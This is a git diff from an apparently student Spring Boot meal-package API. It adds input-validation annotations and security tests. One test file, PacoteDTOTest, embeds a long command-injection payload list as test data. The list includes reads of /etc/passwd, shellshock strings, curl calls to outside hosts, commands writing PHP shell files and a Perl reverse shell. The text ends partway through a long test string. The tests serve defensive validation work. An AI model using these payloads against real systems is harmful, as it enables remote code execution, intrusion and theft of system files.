diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOPatchRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOPatchRequest.java index 03492ffb..a4ff9910 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOPatchRequest.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOPatchRequest.java @@ -14,6 +14,7 @@ public class EncomendaDTOPatchRequest { @NotNull + @Positive private Long encomendaId; @Min(value = 1, message = "Número de refeições por semana inválido") @@ -31,8 +32,10 @@ public class EncomendaDTOPatchRequest { @JsonFormat(pattern="yyyy-MM-dd HH:mm:ss") private LocalDateTime dataEncomenda; @NotNull + @Positive private Long pacoteId; @NotNull + @Positive private Long userId; private Estado estado; diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOResponse.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOResponse.java index 5f6dca19..e4b306bf 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOResponse.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOResponse.java @@ -12,6 +12,8 @@ public class EncomendaDTOResponse { + @NotNull + @Positive private Long encomendaId; @Min(value = 1, message = "Número de refeições por semana inválido") @Max(value = 7, message = "Número de refeições por semana inválido") diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOSaveRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOSaveRequest.java index 28b52ae3..73954617 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOSaveRequest.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOSaveRequest.java @@ -30,8 +30,10 @@ public class EncomendaDTOSaveRequest { @JsonFormat(pattern="yyyy-MM-dd HH:mm:ss") private LocalDateTime dataEncomenda; @NotNull + @Positive private Long pacoteId; @NotNull + @Positive private Long userId; private Estado estado; diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServicePatchRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServicePatchRequest.java index 2ec7a18b..60791611 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServicePatchRequest.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServicePatchRequest.java @@ -11,6 +11,7 @@ public class EncomendaDTOServicePatchRequest { @NotNull + @Positive private Long encomendaId; @Min(value = 1, message = "Número de refeições por semana inválido") @@ -28,8 +29,10 @@ public class EncomendaDTOServicePatchRequest { @JsonFormat(pattern="yyyy-MM-dd HH:mm:ss") private LocalDateTime dataEncomenda; @NotNull + @Positive private Long pacoteId; @NotNull + @Positive private Long userId; diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceRequest.java index 002a798e..50fccf9f 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceRequest.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceRequest.java @@ -25,8 +25,10 @@ public class EncomendaDTOServiceRequest { @JsonFormat(pattern="yyyy-MM-dd HH:mm:ss") private LocalDateTime dataEncomenda; @NotNull + @Positive private Long pacoteId; @NotNull + @Positive private Long userId; diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceResponse.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceResponse.java index da385ffb..c629fb58 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceResponse.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceResponse.java @@ -13,6 +13,7 @@ public class EncomendaDTOServiceResponse { @NotNull + @Positive private Long encomendaId; @Min(value = 1, message = "Número de refeições por semana inválido") @Max(value = 7, message = "Número de refeições por semana inválido") diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaPatchDTOService.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaPatchDTOService.java index 2f6c4af8..b89b3da5 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaPatchDTOService.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaPatchDTOService.java @@ -12,6 +12,7 @@ public class EncomendaPatchDTOService { @NotNull + @Positive private Long encomendaId; @Min(value = 1, message = "Número de refeições por semana inválido") diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOPatchRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOPatchRequest.java index 763209b7..b1f96ca6 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOPatchRequest.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOPatchRequest.java @@ -5,6 +5,7 @@ public class PacoteDTOPatchRequest { @NotNull + @Positive private final Long pacoteId; @@ -14,7 +15,6 @@ public class PacoteDTOPatchRequest { @Size(max = 16, message = "Nome do pacote inválido") private final String nome; - @NotBlank @Min(value = 0, message = "Preço base do pacote inválido") @Max(value = 500, message = "Preço base do pacote inválido") private final double pacoteBasePrice; @@ -25,6 +25,8 @@ public class PacoteDTOPatchRequest { private final String pacoteDescription; private final boolean disabled; + @Positive + @NotNull private final Long tipoPacote; public PacoteDTOPatchRequest(Long pacoteId,String nome, double pacoteBasePrice, String pacoteDescription, boolean disabled, Long tipoPacote) { diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOSaveRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOSaveRequest.java index a636c545..f4ccd64e 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOSaveRequest.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOSaveRequest.java @@ -22,6 +22,8 @@ public class PacoteDTOSaveRequest { private final String pacoteDescription; private final boolean disabled; + @NotNull + @Positive private final Long tipoPacote; public PacoteDTOSaveRequest(String nome, double pacoteBasePrice, String pacoteDescription, boolean disabled, Long tipoPacote) { diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServicePatchRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServicePatchRequest.java index 8da43841..adeacd63 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServicePatchRequest.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServicePatchRequest.java @@ -4,6 +4,7 @@ public class PacoteDTOServicePatchRequest { @NotNull + @Positive private final Long pacoteId; @@ -24,6 +25,8 @@ public class PacoteDTOServicePatchRequest { private final String pacoteDescription; private final boolean disabled; + @Positive + @NotNull private final Long tipoPacote; public PacoteDTOServicePatchRequest(Long pacoteId,String nome, double pacoteBasePrice, String pacoteDescription, boolean disabled, Long tipoPacote) { diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServiceRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServiceRequest.java index 49d291e3..5bf639fb 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServiceRequest.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServiceRequest.java @@ -18,6 +18,8 @@ public class PacoteDTOServiceRequest { private final String pacoteDescription; private final boolean disabled; + @Positive + @NotNull private final Long tipoPacote; public PacoteDTOServiceRequest(String nome, double pacoteBasePrice, String pacoteDescription, boolean disabled, Long tipoPacote) { diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacotePatchDTOService.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacotePatchDTOService.java index 001771c5..0ef7c93b 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacotePatchDTOService.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacotePatchDTOService.java @@ -6,6 +6,7 @@ public class PacotePatchDTOService { @NotNull + @Positive private final Long pacoteId; diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOPatchRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOPatchRequest.java index 1754bb5c..eaa3befe 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOPatchRequest.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOPatchRequest.java @@ -19,8 +19,10 @@ public class ReviewDTOPatchRequest { private final int rating; @NotNull + @Positive private final Long user; @NotNull + @Positive private final Long pacote; public ReviewDTOPatchRequest(Long reviewId,String reviewText, int rating, Long user, Long pacote) { diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOSaveRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOSaveRequest.java index 1b45df81..c759b663 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOSaveRequest.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOSaveRequest.java @@ -16,8 +16,10 @@ public class ReviewDTOSaveRequest { private final int rating; @NotNull + @Positive private final Long user; @NotNull + @Positive private final Long pacote; public ReviewDTOSaveRequest(String reviewText, int rating, Long user, Long pacote) { diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ServiceLayer/ReviewDTOServicePatchRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ServiceLayer/ReviewDTOServicePatchRequest.java index 0726240d..ce251b87 100644 --- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ServiceLayer/ReviewDTOServicePatchRequest.java +++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ServiceLayer/ReviewDTOServicePatchRequest.java @@ -19,8 +19,10 @@ public class ReviewDTOServicePatchRequest { private final int rating; @NotNull + @Positive private final Long user; @NotNull + @Positive private final Long pacote; public ReviewDTOServicePatchRequest(Long reviewId,String reviewText, int rating, Long user, Long pacote) { diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/EncomendaControllerTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/EncomendaControllerTest.java index a9e727db..f3d1e61a 100644 --- a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/EncomendaControllerTest.java +++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/EncomendaControllerTest.java @@ -7,10 +7,7 @@ import isep.ipp.pt.api.desofs.Model.TipoPacote; import isep.ipp.pt.api.desofs.Model.UserModel.Role; import isep.ipp.pt.api.desofs.Model.UserModel.User; -import isep.ipp.pt.api.desofs.Repository.Interface.EncomendaServiceRepo; -import isep.ipp.pt.api.desofs.Repository.Interface.PacoteServiceRepo; -import isep.ipp.pt.api.desofs.Repository.Interface.TipoPacoteServiceRepo; -import isep.ipp.pt.api.desofs.Repository.Interface.UserServiceRepo; +import isep.ipp.pt.api.desofs.Repository.Interface.*; import isep.ipp.pt.api.desofs.Service.EncomendaService.EncomendaService; import org.junit.jupiter.api.*; import org.junit.jupiter.params.ParameterizedTest; @@ -41,9 +38,15 @@ class EncomendaControllerTest { @Autowired private UserServiceRepo userRepo; + @Autowired + private ReviewServiceRepo reviewServiceRepo; + @Autowired + private ReceitaServiceRepo receitaServiceRepo; @BeforeEach public void populate() { + receitaServiceRepo.deleteAll(); + reviewServiceRepo.deleteAll(); encomendaRepo.deleteAll(); pacoteRepo.deleteAll(); userRepo.deleteAll(); @@ -60,6 +63,8 @@ public void populate() { @AfterEach public void clean() { + receitaServiceRepo.deleteAll(); + reviewServiceRepo.deleteAll(); encomendaRepo.deleteAll(); pacoteRepo.deleteAll(); userRepo.deleteAll(); diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/PacoteControllerTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/PacoteControllerTest.java index 6569a95f..95461d7e 100644 --- a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/PacoteControllerTest.java +++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/PacoteControllerTest.java @@ -4,9 +4,7 @@ import isep.ipp.pt.api.desofs.Dto.PacoteDTO.ControllerLayer.PacoteDTOSaveRequest; import isep.ipp.pt.api.desofs.Model.Pacote; import isep.ipp.pt.api.desofs.Model.TipoPacote; -import isep.ipp.pt.api.desofs.Repository.Interface.PacoteServiceRepo; -import isep.ipp.pt.api.desofs.Repository.Interface.ReviewServiceRepo; -import isep.ipp.pt.api.desofs.Repository.Interface.TipoPacoteServiceRepo; +import isep.ipp.pt.api.desofs.Repository.Interface.*; import isep.ipp.pt.api.desofs.Service.PacoteService.PacoteService; import org.apache.catalina.core.ApplicationContext; import org.junit.jupiter.api.*; @@ -32,10 +30,16 @@ class PacoteControllerTest { private TipoPacoteServiceRepo tipoPacoteServiceRepo; @Autowired private ReviewServiceRepo reviewServiceRepo; + @Autowired + private EncomendaServiceRepo encomendaServiceRepo; + @Autowired + private ReceitaServiceRepo receitaServiceRepo; @BeforeEach public void setUp() { + receitaServiceRepo.deleteAll(); + encomendaServiceRepo.deleteAll(); reviewServiceRepo.deleteAll(); pacoteServiceRepo.deleteAll(); TipoPacote tp1 = new TipoPacote(1L, "TugaTube"); @@ -45,6 +49,9 @@ public void setUp() { @AfterEach public void tearDown() { + receitaServiceRepo.deleteAll(); + encomendaServiceRepo.deleteAll(); + reviewServiceRepo.deleteAll(); pacoteServiceRepo.deleteAll(); tipoPacoteServiceRepo.deleteAll(); } diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Utils/PersonalValidationTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Utils/PersonalValidationTest.java index cdbe2cef..d7c531df 100644 --- a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Utils/PersonalValidationTest.java +++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Utils/PersonalValidationTest.java @@ -8,6 +8,7 @@ import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.CsvSource; import org.mockito.Mockito; +import org.springframework.boot.test.context.SpringBootTest; import java.util.Collections; import java.util.Set; @@ -15,6 +16,7 @@ import static org.junit.jupiter.api.Assertions.*; import static org.mockito.Mockito.when; +@SpringBootTest class PersonalValidationTest { private PersonalValidation personalValidation; diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/EncomendaDTOTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/EncomendaDTOTest.java new file mode 100644 index 00000000..5386c313 --- /dev/null +++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/EncomendaDTOTest.java @@ -0,0 +1,123 @@ +package isep.ipp.pt.api.desofs.securityTests; + +import isep.ipp.pt.api.desofs.Dto.EncomendaDTO.ControllerLayer.EncomendaDTOSaveRequest; +import isep.ipp.pt.api.desofs.Model.Estado; +import jakarta.validation.ConstraintViolation; +import jakarta.validation.Validation; +import jakarta.validation.Validator; +import org.junit.jupiter.api.BeforeEach; +import org.junit.jupiter.api.DisplayName; +import org.junit.jupiter.params.ParameterizedTest; +import org.junit.jupiter.params.provider.CsvSource; + +import java.time.LocalDateTime; +import java.util.Set; + +import static org.junit.jupiter.api.Assertions.*; + + +class EncomendaDTOTest { + + private Validator validator; + @BeforeEach + void setUp() { + validator = Validation.buildDefaultValidatorFactory().getValidator(); + } + + + @ParameterizedTest + @CsvSource(textBlock = + """ + -12 + 0 + -3 + -1 + 8 + 9 + 123 + 6431 + """) + @DisplayName("Test security vulnerabilities for number of meals") + public void testSecurityVulnerabilitiesForNumberOfMeals(int numberOfMeals) { + EncomendaDTOSaveRequest response = new EncomendaDTOSaveRequest(numberOfMeals, 2,2, LocalDateTime.now(), 1L, Estado.REGISTADO, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource(textBlock = + """ + -12 + 0 + -23 + -412 + -1 + -99 + """) + @DisplayName("Test security vulnerabilities for price") + public void testSecurityVulnerabilitiesForPrice(double price) { + EncomendaDTOSaveRequest response = new EncomendaDTOSaveRequest(2, 2,price, LocalDateTime.now(), 1L, Estado.REGISTADO, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource(textBlock = + """ + 0 + 6 + -1 + -3 + 7 + 8 + 9 + 996 + -1325 + """) + @DisplayName("Test security vulnerabilities for number of people ") + public void testSecurityVulnerabilitiesForNumberOfPeople(int numberOfPeople) { + EncomendaDTOSaveRequest response = new EncomendaDTOSaveRequest(2, numberOfPeople, 2, LocalDateTime.now(), 1L, Estado.REGISTADO, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + @ParameterizedTest + @CsvSource(textBlock = + """ + 0 + -6 + -1 + -3 + -7 + -8 + -9 + -996 + -1325 + """) + @DisplayName("Test security vulnerabilities for Pacote ID") + public void testSecurityVulnerabilitiesForPacoteID(Long pacoteId) { + EncomendaDTOSaveRequest response = new EncomendaDTOSaveRequest(2, 2, 2, LocalDateTime.now(), pacoteId, Estado.REGISTADO, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource(textBlock = + """ + 0 + -6 + -1 + -3 + -7 + -8 + -9 + -996 + -1325 + """) + @DisplayName("Test security vulnerabilities for User ID") + public void testSecurityVulnerabilitiesForUserId(Long userId) { + EncomendaDTOSaveRequest response = new EncomendaDTOSaveRequest(2, 2, 2, LocalDateTime.now(),1L, Estado.REGISTADO, userId); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + +} \ No newline at end of file diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/PacoteDTOTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/PacoteDTOTest.java new file mode 100644 index 00000000..af74a450 --- /dev/null +++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/PacoteDTOTest.java @@ -0,0 +1,790 @@ +package isep.ipp.pt.api.desofs.securityTests; + +import isep.ipp.pt.api.desofs.Dto.PacoteDTO.ControllerLayer.PacoteDTOPatchRequest; +import isep.ipp.pt.api.desofs.Dto.PacoteDTO.ControllerLayer.PacoteDTOSaveRequest; +import jakarta.validation.ConstraintViolation; +import jakarta.validation.Validation; +import jakarta.validation.Validator; +import org.junit.jupiter.api.BeforeEach; +import org.junit.jupiter.api.DisplayName; +import org.junit.jupiter.params.ParameterizedTest; +import org.junit.jupiter.params.provider.CsvSource; +import org.springframework.boot.test.context.SpringBootTest; + +import java.util.Set; + +import static org.junit.jupiter.api.Assertions.*; + +@SpringBootTest +class PacoteDTOTest { + + + private Validator validator; + @BeforeEach + void setUp() { + validator = Validation.buildDefaultValidatorFactory().getValidator(); + } + + + + @ParameterizedTest + @CsvSource({ + "'1; DROP TABLE users;'", + "''", + "''", + "'',", + "''", + "''", + "''", + "'/index.html|id|'", + "';id;'", + "';id'", + "';netstat -a;'", + "';system(\'cat /etc/passwd\')'", + "'|id'", + "'|/usr/bin/id'", + "'|id|'", + "'|/usr/bin/id|'", + "'||/usr/bin/id|'", + "'|id;', 1", + "'||/usr/bin/id;'", + "';id|'", + "';|/usr/bin/id|'", + "'\\n/bin/ls -al\\n'", + "'\\n/usr/bin/id\\n'", + "'\\nid\\n'", + "'\\n/usr/bin/id;'", + "'\\nid;'", + "'\\n/usr/bin/id|'", + "'\\nid|'", + "';/usr/bin/id\\n'", + "';id\\n'", + "'|usr/bin/id\\n'", + "'|nid\\n'", + "'`id`'", + "'`/usr/bin/id`'", + "'a);id'", + "'a;id'", + "'a);id;'", + "'a;id;'", + "'a);id|'", + "'a;id|'", + "'a)|id'", + "'a|id'", + "'a)|id;'", + "'a|id'", + "'|/bin/ls -al'", + "'a);/usr/bin/id'", + "'a;/usr/bin/id'", + "'a);/usr/bin/id;'", + "'a;/usr/bin/id;'", + "'a);/usr/bin/id|'", + "'a;/usr/bin/id|'", + "'a)|/usr/bin/id'", + "'a|/usr/bin/id'", + "'a)|/usr/bin/id;'", + "'a|/usr/bin/id'", + "';system(\'cat /etc/passwd\')'", + "';system(\'id\')', 1", + "';system(\'/usr/bin/id\')'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A'", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A', 1", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "||", + "|", + ";", + "'", + "'\"", + "\"'", + "&", + "&&", + "%0a", + "%0a%0d", + "%0Aid", + "%0a id %0a", + "%0Aid%0A", + "%0a ping -i 30 127.0.0.1 %0a", + "%0A/usr/bin/id", + "%0A/usr/bin/id%0A", + "%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1`", + "#' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\"", + "|ping -n 21 127.0.0.1", + "%20{${phpinfo()}}", + "%20{${sleep(20)}}", + "%20{${sleep(3)}}", + "a|id|", "a;id|", + "a;id;", + "a;id\n", + "() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12", + "| curl http://crowdshield.com/.testing/rce.txt", + "& curl http://crowdshield.com/.testing/rce.txt", + "; curl https://crowdshield.com/.testing/rce_vuln.txt", + "&& curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt`", + "#' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\"", + "|curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)", + "| dir", "; dir", "$(`dir`)", "& dir", + "&&dir", "&& dir", "| dir C:\\", "; dir C:\\", + "& dir C:\\", "&& dir C:\\", "dir C:\\", + "| dir C:\\Documents and Settings\\*", + "; dir C:\\Documents and Settings\\*", + "& dir C:\\Documents and Settings\\*", + "&& dir C:\\Documents and Settings\\*", + "dir C:\\Documents and Settings\\*", + "| dir C:\\Users", "; dir C:\\Users", + "& dir C:\\Users", "&& dir C:\\Users", + "dir C:\\Users", ";echo%20''", + "echo ''// XXXXXXXXXXX", + "| echo \"\" > rfi.php", + "; echo \"\" > rfi.php", + "& echo \"\" > rfi.php", + "&& echo \"\" > rfi.php", + "echo \"\" > rfi.php", + "| echo \"\" > dir.php", + "; echo \"\" > dir.php", + "& echo \"\" > dir.php", + "&& echo \"\" > dir.php", + "echo \"\" > dir.php", + "| echo \"\" > cmd.php", + "; echo \"\" > cmd.php", + "& echo \"\" > cmd.php", + "&& echo \"\" > cmd.php", + "echo \"\" > cmd.php", + ";echo ''", + "echo ''// XXXXXXXXXXX", + "echo ''// XXXXXXXXXXX", + "| echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "; echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "&& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "() { :;}; echo vulnerable 10", + "eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX